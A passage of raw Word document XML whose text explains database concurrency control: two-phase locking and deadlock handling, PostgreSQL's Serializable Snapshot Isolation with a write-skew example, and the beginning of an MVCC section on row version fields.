    <w:p w14:paraId="00E18DD0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680A1F9B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Lock compatibility matrix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B67BD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          Held:    S      X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E77BADE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Want S:         Yes    No (wait)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72489E21" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Want X:         No     No (wait)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E73CC4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501310E1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Predicate locks (prevent phantoms):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B743D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Range query: SELECT * FROM orders WHERE amount &gt; 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4926FC3C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Acquires a predicate lock on the condition (amount &gt; 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A76CD9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     If TXN B inserts a row satisfying this predicate → conflict → B waits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D07C5FA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42FF7B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   2PL problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4FEEAB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Deadlock: TXN A holds lock on row 1, wants row 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483FFEB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">               TXN B holds lock on row 2, wants row 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FDC67E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">               Neither can proceed → deadlock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B4ADBC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E79D699" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Resolution: deadlock detection (wait-for graph)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A6221" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Database detects cycle in wait-for graph → aborts one transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C036ED1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Victim selection: abort younger transaction (fewer resources wasted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF382B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DAA735" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Deadlock prevention: timestamp ordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D7112" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Each transaction assigned timestamp at start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7B10F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Older transaction: waits for younger or younger aborts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3550470B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Wait-Die: older waits, younger dies (aborts) if younger holds resource older wants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C24C7B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Wound-Wait: older wounds (aborts) younger, younger waits for older</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD0292" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858667F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>2. Serializable Snapshot Isolation (SSI) — PostgreSQL's approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1260C63E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A20387" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Built on top of MVCC (snapshot isolation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E2510" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Adds: conflict detection without acquiring read locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390BA8B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22513745" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Core insight: write skew occurs when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C22491" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     TXN A reads data that TXN B modifies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530181A0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     TXN B reads data that TXN A modifies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6C4BE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     (dangerous structure: read-write conflict cycle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7946A342" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F20D18" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   SIREAD locks (Serializable Read locks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED1DC5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Not blocking — don't prevent other transactions from reading/writing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109BF66C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Just record: "this transaction read this data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A493745" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA2815" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Conflict detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D409B8C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     When TXN B writes a row that TXN A has SIREAD locked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C35AE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Record: "rw-conflict: A read, B wrote" (A →rw B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC43CA8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     When TXN A writes a row that TXN B has SIREAD locked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58012C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Record: "rw-conflict: B read, A wrote" (B →rw A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731F6D7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D74157" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Dangerous structure: cycle of rw-conflicts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F27907" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       A →rw B AND B →rw A: write skew detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19D3E4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Abort one transaction (whichever commits second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE29D34" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB5C9C1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Doctor on-call example with SSI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509C04F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     TXN A: SIREAD lock on on_call table (read all rows for count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122396AE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     TXN B: SIREAD lock on on_call table (read all rows for count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A584DF9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     TXN A: WRITE Alice's row (Alice off-call)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B45593" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     TXN B: WRITE Bob's row (Bob off-call)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2943B5A8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259CABED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     Conflict graph:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C57ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       A read (SIREAD) data that B wrote → A →rw B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B45D4BE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       B read (SIREAD) data that A wrote → B →rw A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF7F52" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Cycle detected!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C46833" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDE264C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     When B tries to COMMIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E700D2C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       "ERROR: could not serialize access due to concurrent update"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6297A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       B aborts, application retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661F4A6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F38182" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   SSI vs 2PL performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC4612" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     2PL: readers block writers, writers block readers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD90552" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          High contention → lots of waiting → low throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ADDA08" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     SSI: readers never block (snapshot isolation underneath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F922413" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          Writers never block readers (MVCC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747EA518" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          Overhead: false positives (some aborts where no real conflict)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399092C3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                    SIREAD lock memory: can be significant under high concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B2538" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AFC224" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   SSI is better for: read-heavy workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7AF08" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   2PL is better for: write-heavy workloads with many conflicts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2721E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MVCC — The Implementation Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0A2D1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Version Concurrency Control is the mechanism that enables most modern isolation implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693156C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A9C6DA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>MVCC core idea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E3AFD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Instead of overwriting data in place:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569D2AE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Keep multiple versions of each row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C41DB9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Each transaction sees the appropriate version based on its snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B52B1B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66439009" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Reads: never block (find appropriate version without locks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F99252" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Writes: create new version (old version kept for concurrent readers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F2098" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274221AA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>PostgreSQL row version structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12444F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="6AD36476" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Each physical row (heap tuple) has system columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC1F3EF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  xmin:   transaction ID that created this row version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7F56A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  xmax:   transaction ID that deleted this row version (0 if current)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E91F6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  cmin:   command ID within creating transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12427BE3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
